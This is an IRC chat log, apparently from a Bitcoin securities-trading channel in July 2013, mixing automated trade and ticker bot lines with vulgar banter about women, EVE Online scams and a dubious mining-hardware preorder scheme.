BTC [-] Jul 11 01:18:27 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 11 01:18:48 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 11 01:19:33 [BTCTC] [DMS.PURCHASE] 36 @ 0.048832 = 1.758 BTC [-] Jul 11 01:21:22 [HAVELOCK] [AM100] 6 @ 0.039998 = 0.24 BTC [+] Jul 11 01:21:28 [HAVELOCK] [AM100] 1 @ 0.039998 BTC [+] Jul 11 01:21:45 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 11 01:21:48 [HAVELOCK] [AM100] 1 @ 0.039998 BTC [+] Jul 11 01:22:07 ;;ticker Jul 11 01:22:08 MtGox BTCUSD ticker | Best bid: 85.80101, Best ask: 85.98000, Bid-ask spread: 0.17899, Last trade: 85.98000, 24 hour volume: 50410.97451797, 24 hour low: 75.50000, 24 hour high: 88.38000, 24 hour vwap: 81.45426 Jul 11 01:22:17 [HAVELOCK] [AM100] 123 @ 0.039998 = 4.9198 BTC [+] Jul 11 01:22:18 [HAVELOCK] [AM100] 538 @ 0.039999 = 21.5195 BTC [+] Jul 11 01:22:18 ;;baratio Jul 11 01:22:18 [HAVELOCK] [AM100] 339 @ 0.04 = 13.56 BTC [+] Jul 11 01:22:19 Total bids: 10822015 USD. Total asks: 114316 BTC. Ratio: 94.66746 USD/BTC. | Data vintage: 37.4334 seconds Jul 11 01:22:28 [HAVELOCK] [AM100] 400 @ 0.04 = 16 BTC [+] Jul 11 01:22:39 [HAVELOCK] [AM100] 40 @ 0.04 = 1.6 BTC [+] Jul 11 01:25:02 [HAVELOCK] [AM100] 57 @ 0.04 = 2.28 BTC [+] Jul 11 01:27:13 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 11 01:28:18 [HAVELOCK] [AM100] 2 @ 0.04 = 0.08 BTC [+] Jul 11 01:28:25 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 11 01:28:51 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 11 01:31:10 [MPEX] [S.MPOE] 1300 @ 0.00081085 = 1.0541 BTC [-] Jul 11 01:32:17 mjr_ nope which ? Jul 11 01:33:47 haha sweet ass on her. Jul 11 01:35:51 [HAVELOCK] [AM100] 5 @ 0.04 = 0.2 BTC [+] Jul 11 01:35:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.043489 BTC [-] Jul 11 01:37:06 [BTCTC] [ASICMINER-PT] 1 @ 4.445 BTC [-] Jul 11 01:37:08 [BTCTC] [ASICMINER-PT] 4 @ 4.446 = 17.784 BTC [+] Jul 11 01:37:09 [BTCTC] [ASICMINER-PT] 3 @ 4.446089 = 13.3383 BTC [+] Jul 11 01:37:11 [BTCTC] [ASICMINER-PT] 1 @ 4.44609 BTC [+] Jul 11 01:37:13 [BTCTC] [ASICMINER-PT] 2 @ 4.447 = 8.894 BTC [+] Jul 11 01:38:33 [HAVELOCK] [AM100] 3 @ 0.04 = 0.12 BTC [+] Jul 11 01:40:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.043489 BTC [-] Jul 11 01:40:26 [BTCTC] [COGNITIVE] 1 @ 0.279999 BTC [+] Jul 11 01:40:36 < Diablo-D3> because they're too busy sucking entire bags of dicks to setup ipv6 Jul 11 01:40:41 [BTCTC] [COGNITIVE] 1 @ 0.29 BTC [+] Jul 11 01:41:25 [BTCTC] [DMS.MINING] 2 @ 0.018397 = 0.0368 BTC [+] Jul 11 01:42:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 11 01:44:01 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 11 01:44:21 [BTCTC] [DMS.PURCHASE] 55 @ 0.048832 = 2.6858 BTC [-] Jul 11 01:44:37 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 11 01:45:35 do dicks come in packs of 6 while balls come in packs of 10 so you have to buy at least 60 dicks at a time ? Jul 11 01:45:41 [BTCTC] [BFMINES] 1 @ 0.004 BTC [+] Jul 11 01:46:10 [HAVELOCK] [AM100] 2 @ 0.04 = 0.08 BTC [+] Jul 11 01:46:35 that's how an asshole would do it Jul 11 01:46:44 hahaha Jul 11 01:46:44 [BTCTC] [AMC-PT] 399 @ 0.0025 = 0.9975 BTC [+] Jul 11 01:46:46 and if you pussies dont let us dicks fuck this asshole we'll get covered in shit Jul 11 01:46:46 :) Jul 11 01:46:56 so a neighbour is having a garden party. there's maybe a dozen cocks Jul 11 01:46:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.043001 = 2.1501 BTC [-] Jul 11 01:46:57 no women Jul 11 01:46:59 [BTCTC] [TAT.ASICMINER] 75 @ 0.043 = 3.225 BTC [-] Jul 11 01:47:04 and they keep exploding in forced laughter Jul 11 01:47:11 in this doomed attempt to show how much fun they're having Jul 11 01:47:15 it's fuckin painful. Jul 11 01:47:36 are you gonna march some nekkid women across your property to watch them gawk? Jul 11 01:47:52 ^ Jul 11 01:47:56 ^ Jul 11 01:48:04 maybe walk over there with a sharpie and your wallet Jul 11 01:48:05 ^ Jul 11 01:48:14 you should inact naked trapese protocol Jul 11 01:48:26 naked giant robot protocol Jul 11 01:48:28 nah Jul 11 01:48:32 with cockpits in the boobs Jul 11 01:48:33 it's night here, i'd have to rig lightsd Jul 11 01:48:35 too lazy Jul 11 01:48:40 all glass cockpits with naked pilots Jul 11 01:48:51 get projector and launch lazer attack Jul 11 01:49:05 earlier i had dinner at this nice restaurant in town Jul 11 01:49:08 it's usually deserted Jul 11 01:49:33 but this time there were 3 tables occupied. 3 guys + 1 woman at one. 3 guys + 1 woman at another. something like 17 dudes + 1 woman at a third. Jul 11 01:49:51 they were all screaming at the motherfucking top of their lungs, it suddenly felt like retardohighschool. Jul 11 01:50:12 waitress comes over, i say "hey, turn the music on just a littkle maybe they get the idea" ? Jul 11 01:50:30 she's like... o, no. tried everything. low music, no effect. loud music maybe it drowns them out ? they just screamed iover it Jul 11 01:50:51 i think someone stole all the women of romania. Jul 11 01:51:22 too many vamps Jul 11 01:51:32 maybe too many amps Jul 11 01:51:37 in like the hitachi. they exploaded. Jul 11 01:51:53 [BTCTC] [DMS.SELLING] 30 @ 0.031997 = 0.9599 BTC [-] Jul 11 01:52:01 vibrated themselves into another dimension Jul 11 01:52:06 they're all in eve Jul 11 01:52:14 which incidentally, is like 99% womenz. played by dudes. Jul 11 01:52:34 https://image.eveonline.com/Character/539827254_128.jpg <<< and they put a shitload of effort into designing them too Jul 11 01:52:34 cuz they like to look at women Jul 11 01:52:52 indeed Jul 11 01:52:54 why do all the Eve avatars look so pleased with themselves Jul 11 01:53:00 is it like doucheville? Jul 11 01:53:03 i think it's mandatory. Jul 11 01:53:09 well actually... it's very like bitcoin Jul 11 01:53:12 TONS of scams. Jul 11 01:53:27 actaully lemme publish this. Jul 11 01:54:24 seems there's a lot of avatar identification to women xD Jul 11 01:54:24 [BTCTC] [GSDPT] 1 @ 0.0021 BTC [+] Jul 11 01:54:25 [BTCTC] [GSDPT] 49 @ 0.0023 = 0.1127 BTC [+] Jul 11 01:54:48 in fairness, i made a girl too Jul 11 01:54:53 dunno exactly why. Jul 11 01:54:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.043489 = 0.1305 BTC [+] Jul 11 01:54:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.04349 = 0.1305 BTC [+] Jul 11 01:54:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.04369 = 0.2621 BTC [+] Jul 11 01:55:01 [BTCTC] [TAT.ASICMINER] 28 @ 0.0437 = 1.2236 BTC [+] Jul 11 01:55:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.0438 = 0.438 BTC [+] Jul 11 01:55:14 that's your thing Jul 11 01:55:20 MPOE-PR Jul 11 01:55:28 right hand of the king Jul 11 01:55:38 hehe Jul 11 01:56:06 [BTCTC] [COGNITIVE] 1 @ 0.309999 BTC [+] Jul 11 01:56:08 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [+] Jul 11 01:56:21 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] Jul 11 01:56:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.0438 = 0.0876 BTC [+] Jul 11 01:56:23 [BTCTC] [COGNITIVE] 2 @ 0.33 = 0.66 BTC [+] Jul 11 01:56:26 [BTCTC] [TAT.ASICMINER] 83 @ 0.0439 = 3.6437 BTC [+] Jul 11 01:56:27 [MPEX] [S.MPOE] 6700 @ 0.00081157 = 5.4375 BTC [+] Jul 11 01:56:29 [MPEX] [S.MPOE] 2150 @ 0.00081285 = 1.7476 BTC [+] Jul 11 01:56:40 [MPEX] [S.MPOE] 629 @ 0.00081308 = 0.5114 BTC [+] Jul 11 01:56:51 [BTCTC] [AMC-PT] 18 @ 0.002499 = 0.045 BTC [-] Jul 11 01:57:00 [HAVELOCK] [AM100] 147 @ 0.04 = 5.88 BTC [+] Jul 11 01:57:32 [HAVELOCK] [AM100] 3 @ 0.041996 = 0.126 BTC [+] Jul 11 01:57:34 [HAVELOCK] [AM100] 300 @ 0.041998 = 12.5994 BTC [+] Jul 11 01:57:35 [HAVELOCK] [AM100] 197 @ 0.042 = 8.274 BTC [+] Jul 11 01:58:03 [BTCTC] [AMC-PT] 21 @ 0.0025 = 0.0525 BTC [+] Jul 11 01:58:20 http://trilema.com/2013/so-you-think-you-know-about-scams-right/ Jul 11 01:58:25 So you think you know about scams, right ? pe Trilema - Un blog de Mircea Popescu. Jul 11 01:58:35 [HAVELOCK] [AM100] 113 @ 0.042 = 4.746 BTC [+] Jul 11 01:58:47 [HAVELOCK] [AM100] 5 @ 0.04298 = 0.2149 BTC [+] Jul 11 01:58:58 [HAVELOCK] [AM100] 5 @ 0.0429995 = 0.215 BTC [+] Jul 11 01:59:11 [HAVELOCK] [AM100] 100 @ 0.043 = 4.3 BTC [+] Jul 11 01:59:21 [HAVELOCK] [AM100] 60 @ 0.04362 = 2.6172 BTC [+] Jul 11 02:00:24 mircea_popescu: when I used to cook for a job I used the progressively-louder-music tactic to encourage stragling customers out at the end of the night Jul 11 02:00:25 we need a scam research team Jul 11 02:00:28 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 11 02:00:36 dub that's convention. Jul 11 02:00:52 what is next year's AMC Jul 11 02:01:03 i'm almost developing respect for AMC at this point Jul 11 02:01:11 he keeps adding these layers of Jul 11 02:01:13 genius Jul 11 02:01:22 i'm developing disrespect for the people listing it. Jul 11 02:01:34 now he has sold $35,000 in preorders Jul 11 02:01:36 i guess it's sorty of the same thing Jul 11 02:01:39 for hardware that does not exist Jul 11 02:01:53 who bought it? Jul 11 02:01:55 sorta like miniblf huh. Jul 11 02:01:59 probably himselgf Jul 11 02:02:02 only 35k in preorders? bfl had more than that in a day Jul 11 02:02:07 but the shareholders are so excited Jul 11 02:03:15 i doubt the shareholders is a set distinct from the shills tbh Jul 11 02:03:21 [BTCTC] [AMC-PT] 255 @ 0.0025 = 0.6375 BTC [+] Jul 11 02:03:29 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 11 02:03:33 yeah Jul 11 02:03:35 there's all these bs offerings which never get bought. chief example would be that guy kumala's exchange Jul 11 02:03:48 [BTCTC] [DMS.PURCHASE] 22 @ 0.048832 = 1.0743 BTC [-] Jul 11 02:03:48 if indeed there existed some actual shareholders they'd have been up in arms at the shit he pulled Jul 11 02:03:52 I'm 89% sure its usagi Jul 11 02:04:10 dub had you said 69% i'd have been worried. Jul 11 02:04:13 same blind them with walls of craptext technique Jul 11 02:04:22 mjr_ did you do her ? Jul 11 02:04:43 lo you can't pin that on usagi. it is a trope older than dirt. Jul 11 02:04:48 hell, they did it in the bible Jul 11 02:05:17 furuknap is the new usagi Jul 11 02:05:21 anyone here fucked mika tan btw ? Jul 11 02:05:39 dude can make text like a champ Jul 11 02:10:05 mircea_popescu: have you not read the greatest eve ponzi story? Jul 11 02:10:14 dude im a weekling. Jul 11 02:10:21 i have no clue. Jul 11 02:10:28 scamming is basically sanctioned by its creators Jul 11 02:10:53 no, from what i can discern they're just like me Jul 11 02:10:59 ie, pay the fuck attention or fu. Jul 11 02:11:05 "A Sansha super carrier called a Revenant is worth approx. 300bil ISK due to being rare in the game. Probably worth more now due to the recent loss from Grath in Pandemic Legion. 1st person to lose one. Seems to be a setup, where Black Legion had a massive fleet waiting to counter drop them." Jul 11 02:11:13 from what i can see a dollar buys ~10mn Jul 11 02:11:21 so that's a 30k virtual spaceship. Jul 11 02:12:12 http://web.archive.org/web/20091026234156/http://geocities.com/currintrading/ Jul 11 02:12:14 Currin Trading Jul 11 02:12:31 o wow. geocituies ? Jul 11 02:12:34 fuck. they win don';t they. Jul 11 02:12:40 linked adinfinitum durign the pirate'scapade Jul 11 02:12:52 i suppose it got filtered out Jul 11 02:13:22 good read anyway Jul 11 02:20:10 [BTCTC] [ASICMINER-PT] 1 @ 4.410888 BTC [-] Jul 11 02:21:27 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 11 02:23:05 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [+] Jul 11 02:26:03 ya not bad Jul 11 02:26:07 [BTCTC] [COGNITIVE] 5 @ 0.347985 = 1.7399 BTC [+] Jul 11 02:26:34 [HAVELOCK] [AM100] 2 @ 0.0434888 = 0.087 BTC [-] Jul 11 02:28:15 [HAVELOCK] [AM100] 300 @ 0.0434988 = 13.0496 BTC [+] Jul 11 02:31:05 [HAVELOCK] [AM100] 124 @ 0.04366599 = 5.4146 BTC [+] Jul 11 02:31:12 [HAVELOCK] [AM100] 1 @ 0.04366599 BTC [+] Jul 11 02:31:29 [HAVELOCK] [AM100] 2 @ 0.04399 = 0.088 BTC [+] Jul 11 02:39:28 [HAVELOCK] [AM100] 312 @ 0.043667 = 13.6241 BTC [-] Jul 11 02:42:11 [MPEX] [S.MPOE] 2646 @ 0.00081308 = 2.1514 BTC [+] Jul 11 02:42:13 [MPEX] [S.MPOE] 1854 @ 0.00081399 = 1.5091 BTC [+] Jul 11 02:42:23 [HAVELOCK] [AM100] 4 @ 0.04399 = 0.176 BTC [+] Jul 11 02:44:25 [BTCTC] [TAT.ASICMINER] 60 @ 0.0432 = 2.592 BTC [-] Jul 11 02:44:26 [BTCTC] [TAT.ASICMINER] 37 @ 0.043015 = 1.5916 BTC [-] Jul 11 02:47:35 [BTCTC] [MININGCO.ETF] 1 @ 1.18 BTC [-] Jul 11 02:47:38 [BTCTC] [MININGCO.ETF] 1 @ 1.16 BTC [-] Jul 11 02:48:17 [BTCTC] [ASICMINER-PT] 1 @ 4.380004 BTC [-] Jul 11 02:49:46 [BTCTC] [DMS.PURCHASE] 85 @ 0.048832 = 4.1507 BTC [-] Jul 11 02:50:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.043899 = 0.3512 BTC [+] Jul 11 02:50:44 [HAVELOCK] [SDICE] 4 @ 0.19998 = 0.7999 BTC [-] Jul 11 02:51:54 [BTCTC] [DMS.MINING] 1 @ 0.0183 BTC [-] Jul 11 02:55:22 [HAVELOCK] [AM100] 1 @ 0.04399 BTC [+] Jul 11 02:55:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.043799 = 0.438 BTC [-] Jul 11 02:57:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0437 BTC [-] Jul 11 02:57:58 [HAVELOCK] [HIM] 9 @ 0.290001 = 2.61 BTC [-] Jul 11 02:59:28 [HAVELOCK] [SDICE] 4 @ 0.199979 = 0.7999 BTC [-] Jul 11 03:01:19 [HAVELOCK] [AM100] 255 @ 0.043671 = 11.1361 BTC [-] Jul 11 03:01:26 [HAVELOCK] [AM100] 74 @ 0.043671 = 3.2317 BTC [-] Jul 11 03:05:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.043796 BTC [+] Jul 11 03:07:35 ;;ticker Jul 11 03:07:36 MtGox BTCUSD ticker | Best bid: 88.04536, Best ask: 88.48000, Bid-ask spread: 0.43464, Last trade: 88.35709, 24 hour volume: 60568.83987043, 24 hour low: 75.53000, 24 hour high: 89.93000, 24 hour vwap: 82.50660 Jul 11 03:11:58 [HAVELOCK] [AM100] 38 @ 0.043671 = 1.6595 BTC [-] Jul 11 03:12:12 [HAVELOCK] [AM100] 150 @ 0.04367 = 6.5505 BTC [-] Jul 11 03:12:13 ;;baratio Jul 11 03:12:13 Total bids: 11169734 USD. Total asks: 110741 BTC. Ratio: 100.86311 USD/BTC. | Data vintage: 105.4076 seconds Jul 11 03:12:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.043021 = 0.4302 BTC [-] Jul 11 03:12:24 [HAVELOCK] [AM100] 64 @ 0.04366599 = 2.7946 BTC [-] Jul 11 03:12:35 [HAVELOCK] [AM100] 1 @ 0.04366599 BTC [-] Jul 11 03:13:12 [BTCTC] [DMS.MINING] 10 @ 0.0182 = 0.182 BTC [-] Jul 11 03:13:15 [BTCTC] [DMS.MINING] 10 @ 0.0181 = 0.181 BTC [-] Jul 11 03:13:17 [BTCTC] [DMS.MINING] 10 @ 0.01805 = 0.1805 BTC [-] Jul 11 03:13:19 [BTCTC] [DMS.MINING] 17 @ 0.018 = 0.306 BTC [-] Jul 11 03:13:20 [BTCTC] [DMS.MINING] 10 @ 0.018 = 0.18 BTC [-] Jul 11 03:13:22 [BTCTC] [DMS.MINING] 1 @ 0.018 BTC [-] Jul 11 03:13:24 [BTCTC] [DMS.MINING] 10 @ 0.018 = 0.18 BTC [-] Jul 11 03:14:40 [MPEX] [S.MPOE] 1067 @ 0.00081085 = 0.8652 BTC [-] Jul 11 03:14:41 [MPEX] [S.MPOE] 1850 @ 0.00081064 = 1.4997 BTC [-] Jul 11 03:14:52 [MPEX] [S.MPOE] 1113 @ 0.00081026 = 0.9018 BTC [-] Jul 11 03:16:02 [BTCTC] [DMS.SELLING] 45 @ 0.031996 = 1.4398 BTC [-] Jul 11 03:16:05 [BTCTC] [TAT.ASICMINER] 8 @ 0.043794 = 0.3504 BTC [+] Jul 11 03:18:45 [HAVELOCK] [AM100] 1 @ 0.043675 BTC [+] Jul 11 03:18:51 [HAVELOCK] [AM100] 2 @ 0.0435 = 0.087 BTC [-] Jul 11 03:19:01 [HAVELOCK] [AM100] 12 @ 0.042512 = 0.5101 BTC [-] Jul 11 03:19:19 [HAVELOCK] [AM100] 2 @ 0.04177088 = 0.0835 BTC [-] Jul 11 03:19:26 [HAVELOCK] [AM100] 1 @ 0.04177077 BTC [-] Jul 11 03:21:26 [HAVELOCK] [AM100] 10 @ 0.0435 = 0.435 BTC [+] Jul 11 03:22:10 [BTCTC] [DMS.SELLING] 9 @ 0.031995 = 0.288 BTC [-] Jul 11 03:22:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.043795 = 0.0876 BTC [+] Jul 11 03:30:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.043028 = 0.4303 BTC [-] Jul 11 03:30:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.043027 = 0.2151 BTC [-] Jul 11 03:34:09 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [-] Jul 11 03:34:58 [BTCTC] [COGNITIVE] 2 @ 0.3 = 0.6 BTC [-] Jul 11 03:36:11 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Jul 11 03:36:36 [BTCTC] [BASIC-MINING] 1 @ 0.271001 BTC [-] Jul 11 03:37:20 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 11 03:37:35 [BTCTC] [S.BBET-PT] 30 @ 0.00199 = 0.0597 BTC [+] Jul 11 03:37:36 [BTCTC] [S.BBET-PT] 43 @ 0.002 = 0.086 BTC [+] Jul 11 03:39:11 [BTCTC] [DMS.SELLING] 4 @ 0.031995 = 0.128 BTC [-] Jul 11 03:40:04 [BTCTC] [B.YABMC] 11 @ 0.00456 = 0.0502 BTC [-] Jul 11 03:40:06 [BTCTC] [B.YABMC] 35 @ 0.004115 = 0.144 BTC [-] Jul 11 03:41:43 [BTCTC] [GSDPT] 100 @ 0.0023 = 0.23 BTC [+] Jul 11 03:42:06 [BTCTC] [DMS.MINING] 13 @ 0.01761 = 0.2289 BTC [-] Jul 11 03:42:08 [BTCTC] [DMS.MINING] 20 @ 0.017606 = 0.3521 BTC [-] Jul 11 03:42:09 [BTCTC] [DMS.MINING] 12 @ 0.017604 = 0.2112 BTC [-] Jul 11 03:42:36 [BTCTC] [DMS.PURCHASE] 48 @ 0.048832 = 2.3439 BTC [-] Jul 11 03:42:49 [BTCTC] [TAT.ASICMINER] 25 @ 0.043793 = 1.0948 BTC [+] Jul 11 03:44:04 [BTCTC] [BASIC-MINING] 5 @ 0.271001 = 1.355 BTC [-] Jul 11 03:47:37 [BTCTC] [ASICMINER-PT] 1 @ 4.385 BTC [+] Jul 11 03:47:39 [BTCTC] [ASICMINER-PT] 1 @ 4.380003 BTC [-] Jul 11 03:47:40 [BTCTC] [ASICMINER-PT] 4 @ 4.380001 = 17.52 BTC [-] Jul 11 03:47:50 [BTCTC] [BITVPS] 1 @ 0.002027 BTC [+] Jul 11 03:47:52 [BTCTC] [BITVPS] 250 @ 0.002028 = 0.507 BTC [+] Jul 11 03:47:53 [BTCTC] [BITVPS] 26 @ 0.002099 = 0.0546 BTC [+] Jul 11 03:48:11 [BTCTC] [TAT.ASICMINER] 32 @ 0.043015 = 1.3765 BTC [-] Jul 11 03:48:16 [BTCTC] [TAT.ASICMINER] 13 @ 0.043014 = 0.5592 BTC [-] Jul 11 03:49:02 [BTCTC] [BASIC-MINING] 1 @ 0.288999 BTC [+] Jul 11 03:49:04 [BTCTC] [BASIC-MINING] 3 @ 0.29 = 0.87 BTC [+] Jul 11 03:50:06 [BTCTC] [BASIC-MINING] 57 @ 0.299 = 17.043 BTC [+] Jul 11 03:50:07 [BTCTC] [BASIC-MINING] 2 @ 0.29999 = 0.6 BTC [+] Jul 11 03:50:09 [BTCTC] [BASIC-MINING] 20 @ 0.3 = 6 BTC [+] Jul 11 03:50:10 [BTCTC] [BASIC-MINING] 6 @ 0.3 = 1.8 BTC [+] Jul 11 03:51:58 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [+] Jul 11 03:53:29 mircea_popescu you are UPIR! Jul 11 03:53:34 I KNEW IT ALL ALONG Jul 11 03:55:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.043793 = 0.1752 BTC [+] Jul 11 03:59:04 [HAVELOCK] [AM100] 1 @ 0.0427 BTC [-] Jul 11 04:00:25 [HAVELOCK] [AM100] 60 @ 0.0425 = 2.55 BTC [-] Jul 11 04:01:46 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [-] Jul 11 04:06:49 [HAVELOCK] [AM100] 2 @ 0.04278989 = 0.0856 BTC [+] Jul 11 04:07:47 [BTCTC] [DMS.MINING] 8 @ 0.017604 = 0.1408 BTC [-] Jul 11 04:07:52 [BTCTC] [DMS.MINING] 50 @ 0.017602 = 0.8801 BTC [-] Jul 11 04:07:55 [BTCTC] [DMS.MINING] 11 @ 0.017601 = 0.1936 BTC [-] Jul 11 04:07:58 [BTCTC] [DMS.MINING] 16 @ 0.017501 = 0.28 BTC [-] Jul 11 04:08:01 [BTCTC] [DMS.MINING] 12 @ 0.017501 = 0.21 BTC [-] Jul 11 04:08:07 [BTCTC] [DMS.MINING] 23 @ 0.017501 = 0.4025 BTC [-] Jul 11 04:08:50 [BTCTC] [ASICMINER-PT] 3 @ 4.38 = 13.14 BTC [-] Jul 11 04:10:06 [BTCTC] [DMS.PURCHASE] 43 @ 0.048832 = 2.0998 BTC [-] Jul 11 04:10:21 [HAVELOCK] [AM100] 100 @ 0.0428 = 4.28 BTC [+] Jul 11 04:10:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.0435 = 0.435 BTC [-] Jul 11 04:10:51 ;;nethash Jul 11 04:10:52 201817.111773 Jul 11 04:13:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.0435 = 0.435 BTC [-] Jul 11 04:14:35 wait wat ? Jul 11 04:14:55 [HAVELOCK] [AM100] 6 @ 0.043675 = 0.2621 BTC [+] Jul 11 04:15:32 [BTCTC] [DMS.MINING] 10 @ 0.01775 = 0.1775 BTC [+] Jul 11 04:15:39 I'm watching bad American television about Transylvanian like stuff Jul 11 04:16:41 [BTCTC] [DMS.MINING] 10 @ 0.01775 = 0.1775 BTC [+] Jul 11 04:16:56 well the "supernatural" Jul 11 04:17:03 [BTCTC] [ASICMINER-PT] 1 @ 4.418 BTC [+] Jul 11 04:19:33 [BTCTC] [DMS.MINING] 6 @ 0.01774 = 0.1064 BTC [-] Jul 11 04:21:15 [BTCTC] [S.DICE-PT] 2 @ 0.002204 = 0.0044 BTC [-] Jul 11 04:21:37 [BTCTC] [TAT.ASICMINER] 29 @ 0.0435 = 1.2615 BTC [-] Jul 11 04:21:51 you're watchign twilight arent you Jul 11 04:22:03 and slojacking Jul 11 04:23:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.0435 = 0.1305 BTC [-] Jul 11 04:24:08 [BTCTC] [BASIC-MINING] 5 @ 0.29999 = 1.5 BTC [-] Jul 11 04:24:17 [BTCTC] [BASIC-MINING] 5 @ 0.299999 = 1.5 BTC [+] Jul 11 04:24:35 [BTCTC] [BASIC-MINING] 13 @ 0.3 = 3.9 BTC [+] Jul 11 04:24:38 [BTCTC] [BASIC-MINING] 10 @ 0.305 = 3.05 BTC [+] Jul 11 04:24:42 [BTCTC] [BASIC-MINING] 20 @ 0.31 = 6.2 BTC [+] Jul 11 04:24:44 [BTCTC] [BASIC-MINING] 10 @ 0.315 = 3.15 BTC [+] Jul 11 04:24:45 [BTCTC] [BASIC-MINING] 20 @ 0.32 = 6.4 BTC [+] Jul 11 04:24:50 [BTCTC] [BASIC-MINING] 19 @ 0.33 = 6.27 BTC [+] Jul 11 04:24:52 [BTCTC] [BASIC-MINING] 20 @ 0.33 = 6.6 BTC [+] Jul 11 04:24:55 [BTCTC] [BASIC-MINING] 20 @ 0.333 = 6.66 BTC [+] Jul 11 04:24:57 [BTCTC] [BASIC-MINING] 88 @ 0.34 = 29.92 BTC [+] Jul 11 04:25:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.0435 = 0.348 BTC [-] Jul 11 04:26:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 11 04:26:31 dub: I am watching Hemlock Grove Jul 11 04:26:33 CLOSE THOUGH Jul 11 04:26:47 It's Twilight if Twilight had been made to mimick Twin Peaks Jul 11 04:26:50 with a legit mystery Jul 11 04:26:57 ?!!?!? Jul 11 04:26:59 crazy Jul 11 04:29:09 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00465 = 0.014 BTC [-] Jul 11 04:29:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004601 BTC [-] Jul 11 04:29:18 [BTCTC] [TAT.VIRTUALMINE] 53 @ 0.0046 = 0.2438 BTC [-] Jul 11 04:29:24 [BTCTC] [TAT.VIRTUALMINE] 311 @ 0.0046 = 1.4306 BTC [-] Jul 11 04:29:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0045 BTC [-] Jul 11 04:29:29 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.00447 = 0.1252 BTC [-] Jul 11 04:29:32 [BTCTC] [TAT.VIRTUALMINE] 69 @ 0.004464 = 0.308 BTC [-] Jul 11 04:29:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00445 BTC [-] Jul 11 04:29:40 [BTCTC] [TAT.VIRTUALMINE] 190 @ 0.004401 = 0.8362 BTC [-] Jul 11 04:29:51 [BTCTC] [DMS.SELLING] 1 @ 0.031992 BTC [-] Jul 11 04:31:28 [HAVELOCK] [AM100] 98 @ 0.043599 = 4.2727 BTC [-] Jul 11 04:31:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.0435 = 0.1305 BTC [-] Jul 11 04:32:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.0435 = 0.087 BTC [-] Jul 11 04:32:24 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 11 04:32:58 [BTCTC] [TAT.ASICMINER] 18 @ 0.0435 = 0.783 BTC [-] Jul 11 04:33:01 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00431 = 0.0086 BTC [-] Jul 11 04:33:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.043793 = 0.2628 BTC [+] Jul 11 04:33:06 [BTCTC] [TAT.VIRTUALMINE] 620 @ 0.004306 = 2.6697 BTC [-] Jul 11 04:33:09 [HAVELOCK] [AM100] 1 @ 0.043599 BTC [-] Jul 11 04:33:18 [BTCTC] [TAT.VIRTUALMINE] 296 @ 0.004305 = 1.2743 BTC [-] Jul 11 04:33:31 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0042 = 0.0252 BTC [-] Jul 11 04:33:39 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0042 = 0.126 BTC [-] Jul 11 04:33:45 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.004001 = 4.001 BTC [-] Jul 11 04:33:49 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.004 = 0.056 BTC [-] Jul 11 04:33:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004 = 0.04 BTC [-] Jul 11 04:33:57 [BTCTC] [DMS.MINING] 37 @ 0.0175 = 0.6475 BTC [-] Jul 11 04:33:59 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004 = 0.02 BTC [-] Jul 11 04:34:02 [BTCTC] [TAT.VIRTUALMINE] 2000 @ 0.004 = 8 BTC [-] Jul 11 